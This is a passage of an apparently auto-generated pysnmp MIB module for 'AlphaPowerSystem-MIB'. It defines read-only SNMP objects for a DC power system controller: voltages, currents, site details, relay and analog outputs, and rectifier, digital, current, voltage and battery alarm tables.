dcPwrSysCustomAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7))
dcPwrSysMiscAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 8))
dcPwrSysCtrlAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 9))
dcPwrSysAdioAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 10))
dcPwrSysConvAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 11))
dcPwrSysInvAlrmTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 12))
dcPwrSysInputsTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6))
dcPwrSysDigIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 1))
dcPwrSysCntrlrIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 2))
dcPwrSysRectIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 3))
dcPwrSysCustomIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 4))
dcPwrSysConvIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 5))
dcPwrSysTimerIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 6))
dcPwrSysCounterIpTbl = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 6, 7))
dcPwrExternalControls = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 8))
dcPwrVarbindNameReference = MibIdentifier((1, 3, 6, 1, 4, 1, 7309, 4, 1, 9))
dcPwrSysChargeVolts = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysChargeVolts.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysChargeVolts.setDescription('This value indicates the present battery voltage. The integer value represent a two digit fix decimal (Value = real voltage * 100) in Volts.')
dcPwrSysDischargeVolts = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDischargeVolts.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDischargeVolts.setDescription('This value indicates the present load voltage. The integer value represent a two digit fix decimal (Value = real voltage * 100) in Volts.')
dcPwrSysChargeAmps = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysChargeAmps.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysChargeAmps.setDescription('This value indicates the present battery currrent. The integer value represent a two digit fix decimal (Value = real current * 100) in Amps.')
dcPwrSysDischargeAmps = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDischargeAmps.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDischargeAmps.setDescription('This value indicates the present load current. The integer value represent a two digit fix decimal (Value = real current * 100) in Amps.')
dcPwrSysMajorAlarm = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMajorAlarm.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMajorAlarm.setDescription('Major Alarm')
dcPwrSysMinorAlarm = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysMinorAlarm.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysMinorAlarm.setDescription('Minor Alarm')
dcPwrSysSiteName = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 1), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteName.setDescription('Site Name')
dcPwrSysSiteCity = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteCity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteCity.setDescription('Site City')
dcPwrSysSiteRegion = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 3), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteRegion.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteRegion.setDescription('Site Region')
dcPwrSysSiteCountry = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteCountry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteCountry.setDescription('Site Country')
dcPwrSysContactName = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 5), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysContactName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysContactName.setDescription('Contact Name')
dcPwrSysPhoneNumber = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysPhoneNumber.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysPhoneNumber.setDescription('Phone Number')
dcPwrSysSiteNumber = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 7), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSiteNumber.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSiteNumber.setDescription('Site Number')
dcPwrSysSystemType = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 8), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSystemType.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSystemType.setDescription('The type of system being monitored by the agent.')
dcPwrSysSystemSerial = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 9), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSystemSerial.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSystemSerial.setDescription('The serial number of the monitored system.')
dcPwrSysSystemNumber = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 10), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSystemNumber.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSystemNumber.setDescription('The number of the monitored system.')
dcPwrSysSoftwareVersion = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 11), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSoftwareVersion.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSoftwareVersion.setDescription('The version of software running on the monitored system.')
dcPwrSysSoftwareTimestamp = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 2, 12), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysSoftwareTimestamp.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysSoftwareTimestamp.setDescription('The time stamp of the software running on the monitored system.')
dcPwrSysRelayCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayCount.setDescription('Number of relay variables in system controller relay table.')
dcPwrSysRelayTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2), )
if mibBuilder.loadTexts: dcPwrSysRelayTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayTable.setDescription('A table of DC power system controller rectifier relay output variables.')
dcPwrSysRelayEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysRelayIndex"))
if mibBuilder.loadTexts: dcPwrSysRelayEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayEntry.setDescription('An entry into the DC power system controller relay output group.')
dcPwrSysRelayIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayIndex.setDescription('The index of the relay variable in the power system controller relay output group.')
dcPwrSysRelayName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayName.setDescription('The description of the relay variable as reported by the DC power system controller relay output group.')
dcPwrSysRelayIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayIntegerValue.setDescription('The integer value of the relay variable as reported by the DC power system controller relay output group.')
dcPwrSysRelayStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayStringValue.setDescription('The string value of the relay variable as reported by the DC power system controller relay output group.')
dcPwrSysRelaySeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelaySeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelaySeverity.setDescription('The integer value of relay severity level of the extra variable as reported by the DC power system controller relay output group.')
dcPwrSysAnalogOpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpCount.setDescription('Number of analog output variables in system controller analog output table.')
dcPwrSysAnalogOpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2), )
if mibBuilder.loadTexts: dcPwrSysAnalogOpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpTable.setDescription('A table of DC power system controller analog output variables.')
dcPwrSysAnalogOpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysAnalogOpIndex"))
if mibBuilder.loadTexts: dcPwrSysAnalogOpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpEntry.setDescription('An entry into the DC power system controller analog output group.')
dcPwrSysAnalogOpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpIndex.setDescription('The index of the analog variable in the power system controller analog output group.')
dcPwrSysAnalogOpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpName.setDescription('The description of the analog variable as reported by the DC power system controller analog output group.')
dcPwrSysAnalogOpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpIntegerValue.setDescription('The integer value of the analog variable as reported by the DC power system controller analog output group.')
dcPwrSysAnalogOpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpStringValue.setDescription('The string value of the analog variable as reported by the DC power system controller analog output group.')
dcPwrSysAnalogOpSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpSeverity.setDescription('The integer value of analog severity level of the extra variable as reported by the DC power system controller analog output group.')
dcPwrSysRectAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmCount.setDescription('Number of rectifier alarm variables in system controller alarm table.')
dcPwrSysRectAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2), )
if mibBuilder.loadTexts: dcPwrSysRectAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmTable.setDescription('A table of DC power system controller rectifier alarm variables.')
dcPwrSysRectAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysRectAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmEntry.setDescription('An entry into the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table rectifier alarm group.')
dcPwrSysRectAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysDigAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmCount.setDescription('Number of digital alarm variables in system controller alarm table.')
dcPwrSysDigAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2), )
if mibBuilder.loadTexts: dcPwrSysDigAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmTable.setDescription('A table of DC power system controller digital alarm variables.')
dcPwrSysDigAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysDigAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysDigAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmEntry.setDescription('An entry into the DC power system controller digital alarm group.')
dcPwrSysDigAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table digital alarm group.')
dcPwrSysDigAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller digital alarm group.')
dcPwrSysDigAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller digital alarm group.')
dcPwrSysDigAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller digital alarm group.')
dcPwrSysDigAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller digital alarm group.')
dcPwrSysCurrAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmCount.setDescription('Number of current alarm variables in system controller alarm table.')
dcPwrSysCurrAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2), )
if mibBuilder.loadTexts: dcPwrSysCurrAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmTable.setDescription('A table of DC power system controller current alarm variables.')
dcPwrSysCurrAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCurrAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysCurrAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmEntry.setDescription('An entry into the DC power system controller current alarm group.')
dcPwrSysCurrAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table current alarm group.')
dcPwrSysCurrAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller current alarm group.')
dcPwrSysCurrAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller current alarm group.')
dcPwrSysCurrAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller current alarm group.')
dcPwrSysCurrAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller current alarm group.')
dcPwrSysVoltAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmCount.setDescription('Number of voltage alarm variables in system controller alarm table.')
dcPwrSysVoltAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2), )
if mibBuilder.loadTexts: dcPwrSysVoltAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmTable.setDescription('A table of DC power system controller voltage alarm variables.')
dcPwrSysVoltAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysVoltAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysVoltAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmEntry.setDescription('An entry into the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table voltage alarm group.')
dcPwrSysVoltAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysBattAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmCount.setDescription('Number of battery alarm variables in system controller alarm table.')
dcPwrSysBattAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2), )
if mibBuilder.loadTexts: dcPwrSysBattAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmTable.setDescription('A table of DC power system controller battery alarm variables.')
dcPwrSysBattAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysBattAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysBattAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmEntry.setDescription('An entry into the DC power system controller battery alarm group.')
dcPwrSysBattAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
